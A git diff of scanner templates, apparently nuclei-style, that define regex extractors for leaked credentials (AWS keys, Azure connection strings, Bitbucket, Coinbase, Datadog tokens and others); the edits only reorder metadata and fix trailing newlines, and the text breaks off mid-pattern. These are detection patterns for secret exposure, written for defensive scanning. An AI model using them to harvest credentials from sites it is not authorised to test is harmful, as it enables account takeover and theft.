+21,4 @@ http: - type: regex part: body regex: - - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml b/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml index 477cea7594..e6bd6004aa 100644 --- a/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml +++ b/http/exposures/tokens/amazon/amazon-mws-auth-token.yaml @@ -4,9 +4,9 @@ info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - tags: exposure,token,aws,amazon,auth metadata: max-request: 1 + tags: exposure,token,aws,amazon,auth http: - method: GET diff --git a/http/exposures/tokens/amazon/amazon-sns-topic.yaml b/http/exposures/tokens/amazon/amazon-sns-topic.yaml index 146d66a27d..13a3635714 100755 --- a/http/exposures/tokens/amazon/amazon-sns-topic.yaml +++ b/http/exposures/tokens/amazon/amazon-sns-topic.yaml @@ -4,16 +4,17 @@ info: name: Amazon SNS Topic Disclosure author: Ice3man severity: info - tags: exposure,token,amazon metadata: max-request: 1 + tags: exposure,token,amazon http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' \ No newline at end of file + - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' diff --git a/http/exposures/tokens/amazon/aws-access-key-value.yaml b/http/exposures/tokens/amazon/aws-access-key-value.yaml index e5d732f610..1da65c26cb 100644 --- a/http/exposures/tokens/amazon/aws-access-key-value.yaml +++ b/http/exposures/tokens/amazon/aws-access-key-value.yaml @@ -4,9 +4,9 @@ info: name: AWS Access Key ID Value author: Swissky severity: info - tags: exposure,token,aws,amazon metadata: max-request: 1 + tags: exposure,token,aws,amazon http: - method: GET diff --git a/http/exposures/tokens/amazon/aws-access-secret-key.yaml b/http/exposures/tokens/amazon/aws-access-secret-key.yaml index b8f0de6a19..cbe02a3a36 100644 --- a/http/exposures/tokens/amazon/aws-access-secret-key.yaml +++ b/http/exposures/tokens/amazon/aws-access-secret-key.yaml @@ -5,8 +5,8 @@ info: author: tess severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 tags: disclosure,aws,exposure,amazon http: diff --git a/http/exposures/tokens/amazon/aws-account-id.yaml b/http/exposures/tokens/amazon/aws-account-id.yaml index b3b30c83ec..29a9a45e9e 100644 --- a/http/exposures/tokens/amazon/aws-account-id.yaml +++ b/http/exposures/tokens/amazon/aws-account-id.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: aws,amazon,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' \ No newline at end of file + - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' diff --git a/http/exposures/tokens/amazon/aws-api-key.yaml b/http/exposures/tokens/amazon/aws-api-key.yaml index 39567ebb5d..1ff763126c 100644 --- a/http/exposures/tokens/amazon/aws-api-key.yaml +++ b/http/exposures/tokens/amazon/aws-api-key.yaml @@ -11,8 +11,8 @@ info: - https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html - https://docs.aws.amazon.com/accounts/latest/reference/credentials-access-keys-best-practices.html metadata: - max-request: 1 verified: true + max-request: 1 tags: aws,amazon,token,exposure http: @@ -24,4 +24,4 @@ http: - type: regex part: body regex: - - '\b((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\b' \ No newline at end of file + - '\b((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\b' diff --git a/http/exposures/tokens/amazon/aws-session-token.yaml b/http/exposures/tokens/amazon/aws-session-token.yaml index b8d92df46f..d6e341df94 100644 --- a/http/exposures/tokens/amazon/aws-session-token.yaml +++ b/http/exposures/tokens/amazon/aws-session-token.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: aws,amazon,token,exposure,session http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' \ No newline at end of file + - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' diff --git a/http/exposures/tokens/artifactory/artifactory-api-password.yaml b/http/exposures/tokens/artifactory/artifactory-api-password.yaml index 4cca3108ff..c335b0433f 100755 --- a/http/exposures/tokens/artifactory/artifactory-api-password.yaml +++ b/http/exposures/tokens/artifactory/artifactory-api-password.yaml @@ -4,9 +4,9 @@ info: name: Artifactory Password Disclosure author: Ice3man severity: info - tags: exposure,token,artifactory metadata: max-request: 1 + tags: exposure,token,artifactory http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' \ No newline at end of file + - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' diff --git a/http/exposures/tokens/artifactory/artifactory-api-token.yaml b/http/exposures/tokens/artifactory/artifactory-api-token.yaml index a93fc26153..191cd08eca 100755 --- a/http/exposures/tokens/artifactory/artifactory-api-token.yaml +++ b/http/exposures/tokens/artifactory/artifactory-api-token.yaml @@ -4,9 +4,9 @@ info: name: Artifactory API Token Disclosure author: Ice3man severity: info - tags: exposure,token,artifactory metadata: max-request: 1 + tags: exposure,token,artifactory http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' \ No newline at end of file + - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' diff --git a/http/exposures/tokens/asana/asana-client-id.yaml b/http/exposures/tokens/asana/asana-client-id.yaml index de4dd4f421..eb96a96342 100644 --- a/http/exposures/tokens/asana/asana-client-id.yaml +++ b/http/exposures/tokens/asana/asana-client-id.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: asana,exposure,tokens,secret http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/asana/asana-client-secret.yaml b/http/exposures/tokens/asana/asana-client-secret.yaml index 05257645b7..80bc3a0ff9 100644 --- a/http/exposures/tokens/asana/asana-client-secret.yaml +++ b/http/exposures/tokens/asana/asana-client-secret.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: asana,exposure,tokens,secret http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/atlassian/atlassian-token.yaml b/http/exposures/tokens/atlassian/atlassian-token.yaml index e6255bf3e6..932f723b4b 100644 --- a/http/exposures/tokens/atlassian/atlassian-token.yaml +++ b/http/exposures/tokens/atlassian/atlassian-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: atlassian,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/azure/azure-apim-secretkey.yaml b/http/exposures/tokens/azure/azure-apim-secretkey.yaml index af3d07b4d9..5cff1c162f 100644 --- a/http/exposures/tokens/azure/azure-apim-secretkey.yaml +++ b/http/exposures/tokens/azure/azure-apim-secretkey.yaml @@ -6,8 +6,8 @@ info: severity: info description: Azure APIM Secret Key metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Ocp-Apim-Subscription-Key" tags: azure,apim,microsoft,exposure diff --git a/http/exposures/tokens/azure/azure-connection.yaml b/http/exposures/tokens/azure/azure-connection.yaml index bff088b94a..16928050bf 100644 --- a/http/exposures/tokens/azure/azure-connection.yaml +++ b/http/exposures/tokens/azure/azure-connection.yaml @@ -9,8 +9,8 @@ info: - https://azure.microsoft.com/en-us/blog/windows-azure-web-sites-how-application-strings-and-connection-strings-work/ - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string metadata: - max-request: 1 verified: true + max-request: 1 tags: azure,exposure,token http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - (?i)(?:AccountName|SharedAccessKeyName|SharedSecretIssuer)\s*=\s*([^;]{1,80})\s*;\s*.{0,10}\s*(?:AccountKey|SharedAccessKey|SharedSecretValue)\s*=\s*([^;]{1,100})(?:;|$) \ No newline at end of file + - (?i)(?:AccountName|SharedAccessKeyName|SharedSecretIssuer)\s*=\s*([^;]{1,80})\s*;\s*.{0,10}\s*(?:AccountKey|SharedAccessKey|SharedSecretValue)\s*=\s*([^;]{1,100})(?:;|$) diff --git a/http/exposures/tokens/beamer/beamer-token.yaml b/http/exposures/tokens/beamer/beamer-token.yaml index 8e5825fc55..06d8b68bdd 100644 --- a/http/exposures/tokens/beamer/beamer-token.yaml +++ b/http/exposures/tokens/beamer/beamer-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: beamer,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml b/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml index 4349abc37c..1914b4416c 100644 --- a/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml +++ b/http/exposures/tokens/bitbucket/bitbucket-clientid.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go metadata: - max-request: 1 verified: true + max-request: 1 tags: bitbucket,exposure,tokens,clientid http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml b/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml index 8d5f679409..7763e4d263 100644 --- a/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml +++ b/http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go metadata: - max-request: 1 verified: true + max-request: 1 tags: bitbucket,exposure,tokens,secret http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/bitly/bitly-secret-key.yaml b/http/exposures/tokens/bitly/bitly-secret-key.yaml index 0e3574f372..9f2e3b20c6 100755 --- a/http/exposures/tokens/bitly/bitly-secret-key.yaml +++ b/http/exposures/tokens/bitly/bitly-secret-key.yaml @@ -4,9 +4,9 @@ info: name: Bitly Secret Key Disclosure author: Ice3man severity: info - tags: exposure,token,bitly metadata: max-request: 1 + tags: exposure,token,bitly http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'R_[0-9a-f]{32}' \ No newline at end of file + - 'R_[0-9a-f]{32}' diff --git a/http/exposures/tokens/bittrex/bittrex-accesskey.yaml b/http/exposures/tokens/bittrex/bittrex-accesskey.yaml index 7e125134df..c34bfa99ef 100644 --- a/http/exposures/tokens/bittrex/bittrex-accesskey.yaml +++ b/http/exposures/tokens/bittrex/bittrex-accesskey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: bittrex,exposure,tokens,accesskey http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/bittrex/bittrex-secretkey.yaml b/http/exposures/tokens/bittrex/bittrex-secretkey.yaml index 5a075f9e68..eaf392c884 100644 --- a/http/exposures/tokens/bittrex/bittrex-secretkey.yaml +++ b/http/exposures/tokens/bittrex/bittrex-secretkey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: bittrex,exposure,tokens,secretkey http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/clojars/clojars-token.yaml b/http/exposures/tokens/clojars/clojars-token.yaml index 1b646b1456..63c8b7ecd5 100644 --- a/http/exposures/tokens/clojars/clojars-token.yaml +++ b/http/exposures/tokens/clojars/clojars-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: clojars,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(CLOJARS_)[a-z0-9]{60} \ No newline at end of file + - (?i)(CLOJARS_)[a-z0-9]{60} diff --git a/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml b/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml index d3a1632265..9bab5cd14d 100755 --- a/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml +++ b/http/exposures/tokens/cloudinary/cloudinary-credentials.yaml @@ -4,9 +4,9 @@ info: name: Cloudinary Credentials Disclosure author: Ice3man severity: info - tags: exposure,token,cloudinary metadata: max-request: 1 + tags: exposure,token,cloudinary http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' \ No newline at end of file + - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' diff --git a/http/exposures/tokens/codeclimate/codeclimate-token.yaml b/http/exposures/tokens/codeclimate/codeclimate-token.yaml index b84799fd03..be2982f5e4 100644 --- a/http/exposures/tokens/codeclimate/codeclimate-token.yaml +++ b/http/exposures/tokens/codeclimate/codeclimate-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml - https://github.com/codeclimate/ruby-test-reporter/issues/34 metadata: - max-request: 1 verified: true + max-request: 1 tags: codeclimate,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' \ No newline at end of file + - '(?i)codeclima.{0,50}\b([a-f0-9]{64})\b' diff --git a/http/exposures/tokens/codecov/codecov-accesstoken.yaml b/http/exposures/tokens/codecov/codecov-accesstoken.yaml index a876e228e8..34f2b81e91 100644 --- a/http/exposures/tokens/codecov/codecov-accesstoken.yaml +++ b/http/exposures/tokens/codecov/codecov-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: codecov,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml b/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml index f47c4c9177..a29d931955 100644 --- a/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml +++ b/http/exposures/tokens/coinbase/coinbase-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: coinbase,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/confluent/confluent-accesstoken.yaml b/http/exposures/tokens/confluent/confluent-accesstoken.yaml index a0f971ea08..3a08f1c380 100644 --- a/http/exposures/tokens/confluent/confluent-accesstoken.yaml +++ b/http/exposures/tokens/confluent/confluent-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: confluent,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/confluent/confluent-secretkey.yaml b/http/exposures/tokens/confluent/confluent-secretkey.yaml index a17beec046..b5d3b22027 100644 --- a/http/exposures/tokens/confluent/confluent-secretkey.yaml +++ b/http/exposures/tokens/confluent/confluent-secretkey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: confluent,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/contentful/contentful-token.yaml b/http/exposures/tokens/contentful/contentful-token.yaml index f42b0ede6c..faa1cee1c1 100644 --- a/http/exposures/tokens/contentful/contentful-token.yaml +++ b/http/exposures/tokens/contentful/contentful-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: contentful,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/crates/crates-api-key.yaml b/http/exposures/tokens/crates/crates-api-key.yaml index 00ea7cbd12..f15c9e0dbc 100644 --- a/http/exposures/tokens/crates/crates-api-key.yaml +++ b/http/exposures/tokens/crates/crates-api-key.yaml @@ -9,8 +9,8 @@ info: - https://crates.io/data-access - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs metadata: - max-request: 1 verified: true + max-request: 1 tags: crates,token,exposure http: @@ -22,4 +22,4 @@ http: - type: regex part: body regex: - - '\bcio[a-zA-Z0-9]{32}\b' \ No newline at end of file + - '\bcio[a-zA-Z0-9]{32}\b' diff --git a/http/exposures/tokens/databricks/databricks-token.yaml b/http/exposures/tokens/databricks/databricks-token.yaml index 5abbf65cd3..c1b3fc5782 100644 --- a/http/exposures/tokens/databricks/databricks-token.yaml +++ b/http/exposures/tokens/databricks/databricks-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: databricks,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/datadog/datadog-accesstoken.yaml b/http/exposures/tokens/datadog/datadog-accesstoken.yaml index 08dabdbe18..37f7382454 100644 --- a/http/exposures/tokens/datadog/datadog-accesstoken.yaml +++ b/http/exposures/tokens/datadog/datadog-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: datadog,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:datadog)(?:[0-9a-z\-_\t 